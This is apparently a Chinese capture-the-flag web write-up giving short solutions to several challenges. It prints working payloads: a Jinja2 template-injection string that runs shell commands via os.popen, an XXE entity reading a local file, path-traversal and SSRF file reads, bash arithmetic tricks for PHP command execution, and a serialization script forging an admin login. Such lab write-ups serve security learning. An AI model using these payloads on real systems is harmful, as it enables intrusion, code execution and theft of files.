赞
踩
目录
SAS - Serializing Authentication
随便试一试,一眼ssrf
file:///flag直接读本地文件
{{7*7}}测出SSTI
随便找个payload打了
{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('tac /f*').read()")}}
一眼文件包含漏洞
../../../../flag
目录穿越拿到flag
?a[]=1&b[]=2&c=2025.a
过了php八股
访问./dollar.php
参考ctfshow web57
【Web】CTFSHOW PHP命令执行刷题记录(全)_ctfweb解题 php-CSDN博客
- 0=$(())
-
- 12=$((~$((-13))))
-
- -13=$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))
-
- 12=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))
傻瓜题
- <?php
-
- class User {
-
- public $username;
-
- public $password;
-
- }
-
- $user=new User();
- $user->username='admin';
- $user->password='secure_password';
- echo base64_encode(serialize($user));
- ?>
以xml形式传数据,打xxe
直接读文件
- <!DOCTYPE test [
- <!ENTITY xxe SYSTEM "file:///flag">
- ]>
- <user><username>&xxe;</username><password>admin</password></user>
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。